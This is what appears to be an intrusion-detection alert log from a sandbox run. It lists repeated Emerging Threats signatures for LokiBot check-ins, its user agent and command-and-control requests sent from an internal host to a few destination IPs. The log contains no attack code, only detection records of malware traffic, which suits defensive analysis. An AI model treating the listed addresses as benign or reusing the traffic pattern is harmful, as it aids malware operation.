05/23/24-20:17:42.120355	TCP	2025381	ET TROJAN LokiBot Checkin	49169	80	192.168.2.22	188.114.96.3
05/23/24-20:18:42.915752	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49223	80	192.168.2.22	188.114.97.3
05/23/24-20:17:54.073092	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49181	80	192.168.2.22	188.114.96.3
05/23/24-20:19:00.429820	TCP	2025381	ET TROJAN LokiBot Checkin	49242	80	192.168.2.22	188.114.96.3
05/23/24-20:17:50.058542	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49177	80	192.168.2.22	188.114.96.9
05/23/24-20:18:39.381191	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49219	80	192.168.2.22	188.114.97.3
05/23/24-20:17:45.155201	TCP	2025381	ET TROJAN LokiBot Checkin	49172	80	192.168.2.22	188.114.96.3
05/23/24-20:18:00.736741	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49187	80	192.168.2.22	188.114.96.3
05/23/24-20:17:56.049434	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49182	80	192.168.2.22	188.114.96.3
05/23/24-20:18:25.484710	TCP	2025381	ET TROJAN LokiBot Checkin	49209	80	192.168.2.22	188.114.97.3
05/23/24-20:17:54.073092	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49181	80	192.168.2.22	188.114.96.3
05/23/24-20:18:47.441038	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49228	80	192.168.2.22	188.114.96.3
05/23/24-20:18:41.210686	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49221	80	192.168.2.22	188.114.97.3
05/23/24-20:18:50.061779	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49231	80	192.168.2.22	188.114.96.3
05/23/24-20:18:54.312724	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49235	80	192.168.2.22	188.114.97.3
05/23/24-20:18:07.989686	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49194	80	192.168.2.22	188.114.96.3
05/23/24-20:18:28.376454	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49212	80	192.168.2.22	188.114.96.9
05/23/24-20:18:28.376454	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49212	80	192.168.2.22	188.114.96.9
05/23/24-20:18:57.792134	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49239	80	192.168.2.22	188.114.97.3
05/23/24-20:18:07.989686	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49194	80	192.168.2.22	188.114.96.3
05/23/24-20:18:03.278750	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49190	80	192.168.2.22	188.114.96.3
05/23/24-20:18:44.730541	TCP	2025381	ET TROJAN LokiBot Checkin	49225	80	192.168.2.22	188.114.97.3
05/23/24-20:18:40.275029	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49220	80	192.168.2.22	188.114.97.9
05/23/24-20:19:02.183841	TCP	2025381	ET TROJAN LokiBot Checkin	49244	80	192.168.2.22	188.114.96.9
05/23/24-20:18:41.210686	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49221	80	192.168.2.22	188.114.97.3
05/23/24-20:18:50.061779	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49231	80	192.168.2.22	188.114.96.3
05/23/24-20:19:11.675767	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49254	80	192.168.2.22	188.114.96.9
05/23/24-20:17:52.694696	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49180	80	192.168.2.22	188.114.97.3
05/23/24-20:19:07.888746	TCP	2025381	ET TROJAN LokiBot Checkin	49250	80	192.168.2.22	188.114.96.3
05/23/24-20:17:38.077506	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49166	80	192.168.2.22	188.114.97.3
05/23/24-20:17:43.183162	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49170	80	192.168.2.22	188.114.97.9
05/23/24-20:18:27.512891	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49211	80	192.168.2.22	188.114.97.3
05/23/24-20:18:41.981231	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49222	80	192.168.2.22	188.114.96.9
05/23/24-20:17:47.208604	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49174	80	192.168.2.22	188.114.97.3
05/23/24-20:17:56.984952	TCP	2025381	ET TROJAN LokiBot Checkin	49183	80	192.168.2.22	188.114.97.3
05/23/24-20:18:58.594043	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49240	80	192.168.2.22	188.114.96.9
05/23/24-20:17:48.088333	TCP	2025381	ET TROJAN LokiBot Checkin	49175	80	192.168.2.22	188.114.97.3
05/23/24-20:18:06.045591	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49192	80	192.168.2.22	188.114.97.3
05/23/24-20:18:19.988815	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49203	80	192.168.2.22	188.114.96.3
05/23/24-20:17:58.820260	TCP	2025381	ET TROJAN LokiBot Checkin	49185	80	192.168.2.22	188.114.96.3
05/23/24-20:18:19.988815	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49203	80	192.168.2.22	188.114.96.3
05/23/24-20:19:10.741295	TCP	2025381	ET TROJAN LokiBot Checkin	49253	80	192.168.2.22	188.114.97.3
05/23/24-20:18:07.107766	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49193	80	192.168.2.22	188.114.97.3
05/23/24-20:18:20.882874	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49204	80	192.168.2.22	188.114.96.9
05/23/24-20:18:58.594043	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49240	80	192.168.2.22	188.114.96.9
05/23/24-20:18:06.045591	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49192	80	192.168.2.22	188.114.97.3
05/23/24-20:18:46.517579	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49227	80	192.168.2.22	188.114.96.9
05/23/24-20:18:08.948107	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49195	80	192.168.2.22	188.114.96.3
05/23/24-20:18:20.882874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49204	80	192.168.2.22	188.114.96.9
05/23/24-20:18:57.792134	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49239	80	192.168.2.22	188.114.97.3
05/23/24-20:18:30.957362	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49215	80	192.168.2.22	188.114.97.3
05/23/24-20:17:40.814233	TCP	2025381	ET TROJAN LokiBot Checkin	49168	80	192.168.2.22	188.114.97.3
05/23/24-20:18:08.948107	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49195	80	192.168.2.22	188.114.96.3
05/23/24-20:18:49.167216	TCP	2025381	ET TROJAN LokiBot Checkin	49230	80	192.168.2.22	188.114.96.3
05/23/24-20:18:56.909324	TCP	2025381	ET TROJAN LokiBot Checkin	49238	80	192.168.2.22	188.114.97.3
05/23/24-20:18:51.088057	TCP	2025381	ET TROJAN LokiBot Checkin	49232	80	192.168.2.22	188.114.97.3
05/23/24-20:17:49.147570	TCP	2025381	ET TROJAN LokiBot Checkin	49176	80	192.168.2.22	188.114.96.3
05/23/24-20:18:18.976087	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49202	80	192.168.2.22	188.114.96.9
05/23/24-20:19:15.184596	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49258	80	192.168.2.22	188.114.96.3
05/23/24-20:18:09.860809	TCP	2025381	ET TROJAN LokiBot Checkin	49196	80	192.168.2.22	188.114.97.3
05/23/24-20:18:07.989686	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49194	80	192.168.2.22	188.114.96.3
05/23/24-20:18:26.597772	TCP	2025381	ET TROJAN LokiBot Checkin	49210	80	192.168.2.22	188.114.96.9
05/23/24-20:18:21.836224	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49205	80	192.168.2.22	188.114.96.3
05/23/24-20:19:09.943896	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49252	80	192.168.2.22	188.114.96.3
05/23/24-20:18:31.712532	TCP	2025381	ET TROJAN LokiBot Checkin	49216	80	192.168.2.22	188.114.97.3
05/23/24-20:18:04.176231	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49191	80	192.168.2.22	188.114.96.3
05/23/24-20:18:02.368807	TCP	2025381	ET TROJAN LokiBot Checkin	49189	80	192.168.2.22	188.114.96.3
05/23/24-20:18:52.425128	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49233	80	192.168.2.22	188.114.97.3
05/23/24-20:18:30.957362	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49215	80	192.168.2.22	188.114.97.3
05/23/24-20:18:52.425128	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49233	80	192.168.2.22	188.114.97.3
05/23/24-20:18:01.557933	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49188	80	192.168.2.22	188.114.96.3
05/23/24-20:17:59.837093	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49186	80	192.168.2.22	188.114.97.3
05/23/24-20:18:06.045591	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49192	80	192.168.2.22	188.114.97.3
05/23/24-20:19:13.398917	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49256	80	192.168.2.22	188.114.97.3
05/23/24-20:17:50.058542	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49177	80	192.168.2.22	188.114.96.9
05/23/24-20:18:23.674890	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49207	80	192.168.2.22	188.114.96.3
05/23/24-20:19:04.226888	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49246	80	192.168.2.22	188.114.96.9
05/23/24-20:18:24.566045	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49208	80	192.168.2.22	188.114.96.3
05/23/24-20:17:51.806006	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49179	80	192.168.2.22	188.114.96.3
05/23/24-20:19:04.226888	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49246	80	192.168.2.22	188.114.96.9
05/23/24-20:17:50.944456	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49178	80	192.168.2.22	188.114.96.3
05/23/24-20:19:09.943896	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49252	80	192.168.2.22	188.114.96.3
05/23/24-20:19:18.441021	TCP	2025381	ET TROJAN LokiBot Checkin	49262	80	192.168.2.22	188.114.96.3
05/23/24-20:17:46.332436	TCP	2025381	ET TROJAN LokiBot Checkin	49173	80	192.168.2.22	188.114.96.3
05/23/24-20:19:07.020535	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49249	80	192.168.2.22	188.114.96.3
05/23/24-20:18:03.278750	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49190	80	192.168.2.22	188.114.96.3
05/23/24-20:18:48.359257	TCP	2025381	ET TROJAN LokiBot Checkin	49229	80	192.168.2.22	188.114.96.9
05/23/24-20:18:59.521470	TCP	2025381	ET TROJAN LokiBot Checkin	49241	80	192.168.2.22	188.114.97.3
05/23/24-20:17:50.944456	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49178	80	192.168.2.22	188.114.96.3
05/23/24-20:17:59.837093	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49186	80	192.168.2.22	188.114.97.3
05/23/24-20:18:23.674890	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49207	80	192.168.2.22	188.114.96.3
05/23/24-20:17:36.624490	TCP	2025381	ET TROJAN LokiBot Checkin	49165	80	192.168.2.22	188.114.96.9
05/23/24-20:18:28.376454	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49212	80	192.168.2.22	188.114.96.9
05/23/24-20:17:35.132025	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49164	80	192.168.2.22	188.114.97.3
05/23/24-20:17:44.106859	TCP	2025381	ET TROJAN LokiBot Checkin	49171	80	192.168.2.22	188.114.97.3
05/23/24-20:17:43.183162	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49170	80	192.168.2.22	188.114.97.9
05/23/24-20:18:03.278750	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49190	80	192.168.2.22	188.114.96.3
05/23/24-20:19:07.020535	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49249	80	192.168.2.22	188.114.96.3
05/23/24-20:19:17.653379	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49261	80	192.168.2.22	188.114.96.3
05/23/24-20:18:53.400223	TCP	2025381	ET TROJAN LokiBot Checkin	49234	80	192.168.2.22	188.114.96.3
05/23/24-20:17:43.183162	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49170	80	192.168.2.22	188.114.97.9
05/23/24-20:19:16.882044	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49260	80	192.168.2.22	188.114.96.3
05/23/24-20:17:46.332436	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49173	80	192.168.2.22	188.114.96.3
05/23/24-20:18:46.517579	TCP	2025381	ET TROJAN LokiBot Checkin	49227	80	192.168.2.22	188.114.96.9
05/23/24-20:19:16.882044	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49260	80	192.168.2.22	188.114.96.3
05/23/24-20:19:15.184596	TCP	2025381	ET TROJAN LokiBot Checkin	49258	80	192.168.2.22	188.114.96.3
05/23/24-20:18:58.594043	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49240	80	192.168.2.22	188.114.96.9
05/23/24-20:18:01.557933	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49188	80	192.168.2.22	188.114.96.3
05/23/24-20:18:41.210686	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49221	80	192.168.2.22	188.114.97.3
05/23/24-20:17:47.208604	TCP	2025381	ET TROJAN LokiBot Checkin	49174	80	192.168.2.22	188.114.97.3
05/23/24-20:18:04.176231	TCP	2025381	ET TROJAN LokiBot Checkin	49191	80	192.168.2.22	188.114.96.3
05/23/24-20:18:16.270962	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49199	80	192.168.2.22	188.114.96.3
05/23/24-20:18:51.088057	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49232	80	192.168.2.22	188.114.97.3
05/23/24-20:17:56.984952	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49183	80	192.168.2.22	188.114.97.3
05/23/24-20:18:00.736741	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49187	80	192.168.2.22	188.114.96.3
05/23/24-20:18:23.674890	TCP	2025381	ET TROJAN LokiBot Checkin	49207	80	192.168.2.22	188.114.96.3
05/23/24-20:18:56.093323	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49237	80	192.168.2.22	188.114.97.3
05/23/24-20:18:06.045591	TCP	2025381	ET TROJAN LokiBot Checkin	49192	80	192.168.2.22	188.114.97.3
05/23/24-20:18:17.156368	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49200	80	192.168.2.22	188.114.96.3
05/23/24-20:18:00.736741	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49187	80	192.168.2.22	188.114.96.3
05/23/24-20:17:56.984952	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49183	80	192.168.2.22	188.114.97.3
05/23/24-20:19:06.064261	TCP	2025381	ET TROJAN LokiBot Checkin	49248	80	192.168.2.22	188.114.96.3
05/23/24-20:17:38.077506	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49166	80	192.168.2.22	188.114.97.3
05/23/24-20:18:56.909324	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49238	80	192.168.2.22	188.114.97.3
05/23/24-20:18:43.784658	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49224	80	192.168.2.22	188.114.97.3
05/23/24-20:18:20.882874	TCP	2025381	ET TROJAN LokiBot Checkin	49204	80	192.168.2.22	188.114.96.9
05/23/24-20:18:48.359257	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49229	80	192.168.2.22	188.114.96.9
05/23/24-20:18:53.400223	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49234	80	192.168.2.22	188.114.96.3
05/23/24-20:19:07.020535	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49249	80	192.168.2.22	188.114.96.3
05/23/24-20:18:18.976087	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49202	80	192.168.2.22	188.114.96.9
05/23/24-20:18:25.484710	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49209	80	192.168.2.22	188.114.97.3
05/23/24-20:18:29.294238	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49213	80	192.168.2.22	188.114.96.3
05/23/24-20:17:36.624490	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49165	80	192.168.2.22	188.114.96.9
05/23/24-20:17:49.147570	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49176	80	192.168.2.22	188.114.96.3
05/23/24-20:19:04.226888	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49246	80	192.168.2.22	188.114.96.9
05/23/24-20:19:18.441021	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49262	80	192.168.2.22	188.114.96.3
05/23/24-20:17:47.208604	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49174	80	192.168.2.22	188.114.97.3
05/23/24-20:18:38.560340	TCP	2025381	ET TROJAN LokiBot Checkin	49218	80	192.168.2.22	188.114.97.9
05/23/24-20:17:48.088333	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49175	80	192.168.2.22	188.114.97.3
05/23/24-20:17:58.820260	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49185	80	192.168.2.22	188.114.96.3
05/23/24-20:17:44.106859	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49171	80	192.168.2.22	188.114.97.3
05/23/24-20:17:48.088333	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49175	80	192.168.2.22	188.114.97.3
05/23/24-20:17:58.820260	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49185	80	192.168.2.22	188.114.96.3
05/23/24-20:18:42.915752	TCP	2025381	ET TROJAN LokiBot Checkin	49223	80	192.168.2.22	188.114.97.3
05/23/24-20:17:59.837093	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49186	80	192.168.2.22	188.114.97.3
05/23/24-20:19:07.888746	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49250	80	192.168.2.22	188.114.96.3
05/23/24-20:18:03.278750	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49190	80	192.168.2.22	188.114.96.3
05/23/24-20:17:50.944456	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49178	80	192.168.2.22	188.114.96.3
05/23/24-20:17:59.837093	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49186	80	192.168.2.22	188.114.97.3
05/23/24-20:18:45.625277	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49226	80	192.168.2.22	188.114.96.3
05/23/24-20:19:07.888746	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49250	80	192.168.2.22	188.114.96.3
05/23/24-20:18:27.512891	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49211	80	192.168.2.22	188.114.97.3
05/23/24-20:18:25.484710	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49209	80	192.168.2.22	188.114.97.3
05/23/24-20:19:07.020535	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49249	80	192.168.2.22	188.114.96.3
05/23/24-20:18:02.368807	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49189	80	192.168.2.22	188.114.96.3
05/23/24-20:19:08.863871	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49251	80	192.168.2.22	188.114.96.3
05/23/24-20:17:35.132025	TCP	2025381	ET TROJAN LokiBot Checkin	49164	80	192.168.2.22	188.114.97.3
05/23/24-20:19:05.135747	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49247	80	192.168.2.22	188.114.97.9
05/23/24-20:17:45.155201	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49172	80	192.168.2.22	188.114.96.3
05/23/24-20:18:24.566045	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49208	80	192.168.2.22	188.114.96.3
05/23/24-20:17:43.183162	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49170	80	192.168.2.22	188.114.97.9
05/23/24-20:17:45.155201	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49172	80	192.168.2.22	188.114.96.3
05/23/24-20:19:14.278026	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49257	80	192.168.2.22	188.114.96.3
05/23/24-20:18:18.079750	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49201	80	192.168.2.22	188.114.97.3
05/23/24-20:18:24.566045	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49208	80	192.168.2.22	188.114.96.3
05/23/24-20:18:29.294238	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49213	80	192.168.2.22	188.114.96.3
05/23/24-20:19:12.597934	TCP	2025381	ET TROJAN LokiBot Checkin	49255	80	192.168.2.22	188.114.96.3
05/23/24-20:18:07.989686	TCP	2025381	ET TROJAN LokiBot Checkin	49194	80	192.168.2.22	188.114.96.3
05/23/24-20:18:39.381191	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49219	80	192.168.2.22	188.114.97.3
05/23/24-20:18:49.167216	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49230	80	192.168.2.22	188.114.96.3
05/23/24-20:18:54.312724	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49235	80	192.168.2.22	188.114.97.3
05/23/24-20:18:50.061779	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49231	80	192.168.2.22	188.114.96.3
05/23/24-20:17:57.920775	TCP	2025381	ET TROJAN LokiBot Checkin	49184	80	192.168.2.22	188.114.96.3
05/23/24-20:18:59.521470	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49241	80	192.168.2.22	188.114.97.3
05/23/24-20:18:26.597772	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49210	80	192.168.2.22	188.114.96.9
05/23/24-20:18:49.167216	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49230	80	192.168.2.22	188.114.96.3
05/23/24-20:18:59.521470	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49241	80	192.168.2.22	188.114.97.3
05/23/24-20:18:30.098368	TCP	2025381	ET TROJAN LokiBot Checkin	49214	80	192.168.2.22	188.114.96.9
05/23/24-20:19:11.675767	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49254	80	192.168.2.22	188.114.96.9
05/23/24-20:17:36.624490	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49165	80	192.168.2.22	188.114.96.9
05/23/24-20:18:17.156368	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49200	80	192.168.2.22	188.114.96.3
05/23/24-20:17:50.058542	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49177	80	192.168.2.22	188.114.96.9
05/23/24-20:18:39.381191	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49219	80	192.168.2.22	188.114.97.3
05/23/24-20:18:55.233506	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49236	80	192.168.2.22	188.114.96.9
05/23/24-20:19:13.398917	TCP	2025381	ET TROJAN LokiBot Checkin	49256	80	192.168.2.22	188.114.97.3
05/23/24-20:17:50.058542	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49177	80	192.168.2.22	188.114.96.9
05/23/24-20:18:11.714251	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49198	80	192.168.2.22	188.114.96.3
05/23/24-20:18:11.714251	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49198	80	192.168.2.22	188.114.96.3
05/23/24-20:18:52.425128	TCP	2025381	ET TROJAN LokiBot Checkin	49233	80	192.168.2.22	188.114.97.3
05/23/24-20:18:30.957362	TCP	2025381	ET TROJAN LokiBot Checkin	49215	80	192.168.2.22	188.114.97.3
05/23/24-20:18:16.270962	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49199	80	192.168.2.22	188.114.96.3
05/23/24-20:17:39.511374	TCP	2025381	ET TROJAN LokiBot Checkin	49167	80	192.168.2.22	188.114.97.3
05/23/24-20:18:51.088057	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49232	80	192.168.2.22	188.114.97.3
05/23/24-20:18:47.441038	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49228	80	192.168.2.22	188.114.96.3
05/23/24-20:18:07.107766	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49193	80	192.168.2.22	188.114.97.3
05/23/24-20:18:37.677256	TCP	2025381	ET TROJAN LokiBot Checkin	49217	80	192.168.2.22	188.114.96.3
05/23/24-20:18:50.061779	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49231	80	192.168.2.22	188.114.96.3
05/23/24-20:18:09.860809	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49196	80	192.168.2.22	188.114.97.3
05/23/24-20:18:09.860809	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49196	80	192.168.2.22	188.114.97.3
05/23/24-20:17:56.049434	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49182	80	192.168.2.22	188.114.96.3
05/23/24-20:18:40.275029	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49220	80	192.168.2.22	188.114.97.9
05/23/24-20:18:18.079750	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49201	80	192.168.2.22	188.114.97.3
05/23/24-20:18:40.275029	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49220	80	192.168.2.22	188.114.97.9
05/23/24-20:19:14.278026	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49257	80	192.168.2.22	188.114.96.3
05/23/24-20:18:22.772748	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49206	80	192.168.2.22	188.114.96.3
05/23/24-20:18:07.107766	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49193	80	192.168.2.22	188.114.97.3
05/23/24-20:17:56.049434	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49182	80	192.168.2.22	188.114.96.3
05/23/24-20:18:41.981231	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49222	80	192.168.2.22	188.114.96.9
05/23/24-20:18:55.233506	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49236	80	192.168.2.22	188.114.96.9
05/23/24-20:17:52.694696	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49180	80	192.168.2.22	188.114.97.3
05/23/24-20:18:41.981231	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49222	80	192.168.2.22	188.114.96.9
05/23/24-20:17:40.814233	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49168	80	192.168.2.22	188.114.97.3
05/23/24-20:18:19.988815	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49203	80	192.168.2.22	188.114.96.3
05/23/24-20:17:40.814233	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49168	80	192.168.2.22	188.114.97.3
05/23/24-20:18:19.988815	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49203	80	192.168.2.22	188.114.96.3
05/23/24-20:17:54.073092	TCP	2025381	ET TROJAN LokiBot Checkin	49181	80	192.168.2.22	188.114.96.3
05/23/24-20:19:16.005968	TCP	2025381	ET TROJAN LokiBot Checkin	49259	80	192.168.2.22	188.114.97.3
05/23/24-20:18:31.712532	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49216	80	192.168.2.22	188.114.97.3
05/23/24-20:18:31.712532	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49216	80	192.168.2.22	188.114.97.3
05/23/24-20:18:10.679781	TCP	2025381	ET TROJAN LokiBot Checkin	49197	80	192.168.2.22	188.114.96.3
